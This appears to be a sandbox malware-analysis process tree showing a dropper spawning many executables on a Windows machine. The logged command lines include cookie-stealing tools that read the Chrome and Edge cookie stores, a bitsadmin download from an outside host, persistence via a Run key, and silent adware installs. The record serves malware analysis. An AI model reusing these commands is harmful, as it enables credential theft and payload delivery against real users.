    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
    3⤵
    PID:1212
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
    3⤵
    PID:3880
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4828 /prefetch:8
    3⤵
    PID:6552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
    3⤵
    PID:6816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
    3⤵
    PID:7028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
    3⤵
    PID:2536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
    3⤵
    PID:4416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5792 /prefetch:2
    3⤵
    PID:8000
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5528
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a
    3⤵
    PID:2420
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"
  2⤵
  PID:5968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 240
    3⤵
    - Program crash
    PID:2420
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1172
- - C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe
    "C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5612
  - - C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe
      C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5256
- - C:\Users\Admin\Documents\xEL0UOsp9f5GdO130zgfqNJ8.exe
    "C:\Users\Admin\Documents\xEL0UOsp9f5GdO130zgfqNJ8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 296
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2084
- - C:\Users\Admin\Documents\OwOf1A4hkWQqEkrB13_paZa8.exe
    "C:\Users\Admin\Documents\OwOf1A4hkWQqEkrB13_paZa8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4136
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4700
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6224
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3924
- - C:\Users\Admin\Documents\3rNFvXzLXMlNFCvc32Oqh9Ch.exe
    "C:\Users\Admin\Documents\3rNFvXzLXMlNFCvc32Oqh9Ch.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:496
  - - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of SetWindowsHookEx
      PID:6512
  - - C:\Program Files (x86)\Company\NewProduct\customer3.exe
      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
      4⤵
      Executes dropped EXE
      Drops startup file
      Suspicious use of SetWindowsHookEx
      PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7024
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1852
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6612
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6044
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6572
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5540
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7836
    - - C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7956
  - - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
      4⤵
      Executes dropped EXE
      PID:3540
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6316
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1904
- - C:\Users\Admin\Documents\B9O6bq19rea6BpyKuUJzYQ6Q.exe
    "C:\Users\Admin\Documents\B9O6bq19rea6BpyKuUJzYQ6Q.exe"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    PID:5748
- - C:\Users\Admin\Documents\TFHkMhqeTSNcqQMPGLxmtN9g.exe
    "C:\Users\Admin\Documents\TFHkMhqeTSNcqQMPGLxmtN9g.exe"
    3⤵
    PID:5204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 300
      4⤵
      Program crash
      PID:7132
- - C:\Users\Admin\Documents\fVqhXPVEa95IDkaUhXHBvgdO.exe
    "C:\Users\Admin\Documents\fVqhXPVEa95IDkaUhXHBvgdO.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 312
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1992
- - C:\Users\Admin\Documents\XXfonD7r0ujlJOE69vCARQwf.exe
    "C:\Users\Admin\Documents\XXfonD7r0ujlJOE69vCARQwf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5636
  - - C:\Users\Admin\Documents\XXfonD7r0ujlJOE69vCARQwf.exe
      "C:\Users\Admin\Documents\XXfonD7r0ujlJOE69vCARQwf.exe"
      4⤵
      PID:804
- - C:\Users\Admin\Documents\sBf7se8pdHa7It2u292JAYsq.exe
    "C:\Users\Admin\Documents\sBf7se8pdHa7It2u292JAYsq.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5552
  - - C:\Users\Admin\Documents\sBf7se8pdHa7It2u292JAYsq.exe
      "C:\Users\Admin\Documents\sBf7se8pdHa7It2u292JAYsq.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:6256
- - C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe
    "C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2420
  - - C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe
      C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe
      4⤵
      PID:5828
  - - C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe
      C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4396
- - C:\Users\Admin\Documents\nO03ABkh7hdqIUnSBO69uWWI.exe
    "C:\Users\Admin\Documents\nO03ABkh7hdqIUnSBO69uWWI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:5328
  - - C:\Users\Admin\Documents\nO03ABkh7hdqIUnSBO69uWWI.exe
      "C:\Users\Admin\Documents\nO03ABkh7hdqIUnSBO69uWWI.exe"
      4⤵
      Executes dropped EXE
      PID:6740
- - C:\Users\Admin\Documents\dSoPTyxhok6cHs2ybW6rnWhT.exe
    "C:\Users\Admin\Documents\dSoPTyxhok6cHs2ybW6rnWhT.exe"
    3⤵
    - Executes dropped EXE
    PID:6024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 240
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5444
- - C:\Users\Admin\Documents\ys8YRG5UgmpkjNZexReC2Xbd.exe
    "C:\Users\Admin\Documents\ys8YRG5UgmpkjNZexReC2Xbd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:5968
  - - C:\Users\Admin\Documents\ys8YRG5UgmpkjNZexReC2Xbd.exe
      "C:\Users\Admin\Documents\ys8YRG5UgmpkjNZexReC2Xbd.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:6840
- - C:\Users\Admin\Documents\wo2fMrz_7qjffU_x_shlqyk0.exe
    "C:\Users\Admin\Documents\wo2fMrz_7qjffU_x_shlqyk0.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5924
- - C:\Users\Admin\Documents\duZ8PiCmHX783JGssa2_JrDB.exe
    "C:\Users\Admin\Documents\duZ8PiCmHX783JGssa2_JrDB.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3700
  - - C:\Users\Admin\Documents\duZ8PiCmHX783JGssa2_JrDB.exe
      C:\Users\Admin\Documents\duZ8PiCmHX783JGssa2_JrDB.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4692
- - C:\Users\Admin\Documents\uhlMvjiM_cFKqG2sa1Chga1X.exe
    "C:\Users\Admin\Documents\uhlMvjiM_cFKqG2sa1Chga1X.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
  - - C:\Users\Admin\AppData\Roaming\2533838.exe
      "C:\Users\Admin\AppData\Roaming\2533838.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4476
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4476 -s 2316
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4564
  - - C:\Users\Admin\AppData\Roaming\4628016.exe
      "C:\Users\Admin\AppData\Roaming\4628016.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:5076
  - - C:\Users\Admin\AppData\Roaming\6442635.exe
      "C:\Users\Admin\AppData\Roaming\6442635.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2940
  - - C:\Users\Admin\AppData\Roaming\5413231.exe
      "C:\Users\Admin\AppData\Roaming\5413231.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:7036
- - C:\Users\Admin\Documents\w_T2ZpoqCL6IAkXoimhlntEt.exe
    "C:\Users\Admin\Documents\w_T2ZpoqCL6IAkXoimhlntEt.exe"
    3⤵
    - Executes dropped EXE
    PID:6168
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6168 -s 240
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:2468
- - C:\Users\Admin\Documents\NMtYBWQ61pYznbqVoJMOaC6c.exe
    "C:\Users\Admin\Documents\NMtYBWQ61pYznbqVoJMOaC6c.exe"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    PID:6504
- - C:\Users\Admin\Documents\S47rYlKP5jCrGkLBNX4aJRHK.exe
    "C:\Users\Admin\Documents\S47rYlKP5jCrGkLBNX4aJRHK.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6888
  - - C:\Users\Admin\AppData\Roaming\5831941.exe
      "C:\Users\Admin\AppData\Roaming\5831941.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5288
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5288 -s 2360
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:604
  - - C:\Users\Admin\AppData\Roaming\7315424.exe
      "C:\Users\Admin\AppData\Roaming\7315424.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5972
- - C:\Users\Admin\Documents\AzRQxmcTqX_2X8NQkYpru4an.exe
    "C:\Users\Admin\Documents\AzRQxmcTqX_2X8NQkYpru4an.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:7060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7076
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      PID:3392
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      PID:5048
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      PID:6964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      PID:4872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      PID:7384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjAA03.tmp\tempfile.ps1"
      4⤵
      Checks for any installed AV software in registry
      PID:1320
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
      4⤵
      Download via BitsAdmin
      PID:1604
- - C:\Users\Admin\Documents\bodlAh1CVSDV9qX9YyeSQ3yC.exe
    "C:\Users\Admin\Documents\bodlAh1CVSDV9qX9YyeSQ3yC.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6560
  - - C:\Users\Admin\AppData\Local\Temp\is-53PGP.tmp\bodlAh1CVSDV9qX9YyeSQ3yC.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-53PGP.tmp\bodlAh1CVSDV9qX9YyeSQ3yC.tmp" /SL5="$302F4,138429,56832,C:\Users\Admin\Documents\bodlAh1CVSDV9qX9YyeSQ3yC.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:4512
    - - C:\Users\Admin\AppData\Local\Temp\is-IRUCF.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-IRUCF.tmp\Setup.exe" /Verysilent
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:3168
      - C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4912
        
        C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
        7⤵
        Executes dropped EXE
        
        PID:5828
      - C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5856
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628842403 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
        7⤵
        
        PID:2900
      - C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"
        6⤵
        Executes dropped EXE
        
        PID:5500
        
        C:\Users\Admin\AppData\Roaming\4700446.exe
        
        "C:\Users\Admin\AppData\Roaming\4700446.exe"
        7⤵
        
        PID:6860
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6860 -s 2316
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2712
        
        C:\Users\Admin\AppData\Roaming\4395099.exe
        
        "C:\Users\Admin\AppData\Roaming\4395099.exe"
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\3671042.exe
        
        "C:\Users\Admin\AppData\Roaming\3671042.exe"
        7⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Roaming\3392110.exe
        
        "C:\Users\Admin\AppData\Roaming\3392110.exe"
        7⤵
        
        PID:7364
      - C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\is-FS7V9.tmp\MediaBurner2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FS7V9.tmp\MediaBurner2.tmp" /SL5="$5027E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        7⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\is-0TMRN.tmp\3377047_logo_media.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0TMRN.tmp\3377047_logo_media.exe" /S /UID=burnerch2
        8⤵
        Drops file in Drivers directory
        Adds Run key to start application
        
        PID:7532
        
        C:\Program Files\Windows Defender Advanced Threat Protection\DGBZBAPNLG\ultramediaburner.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\DGBZBAPNLG\ultramediaburner.exe" /VERYSILENT
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\is-Q1059.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q1059.tmp\ultramediaburner.tmp" /SL5="$60238,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\DGBZBAPNLG\ultramediaburner.exe" /VERYSILENT
        10⤵
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4496
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        11⤵
        
        PID:7784
        
        C:\Users\Admin\AppData\Local\Temp\b3-8f0fb-3eb-8fa9e-314a76ea6bf4b\Fabalihaewae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b3-8f0fb-3eb-8fa9e-314a76ea6bf4b\Fabalihaewae.exe"
        9⤵
        
        PID:7800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        10⤵
        
        PID:1844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffef2fe46f8,0x7ffef2fe4708,0x7ffef2fe4718
        11⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\ff-96bb9-3e7-b499f-40142d62e281b\Siwupadyke.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ff-96bb9-3e7-b499f-40142d62e281b\Siwupadyke.exe"
        9⤵
        
        PID:2016
        
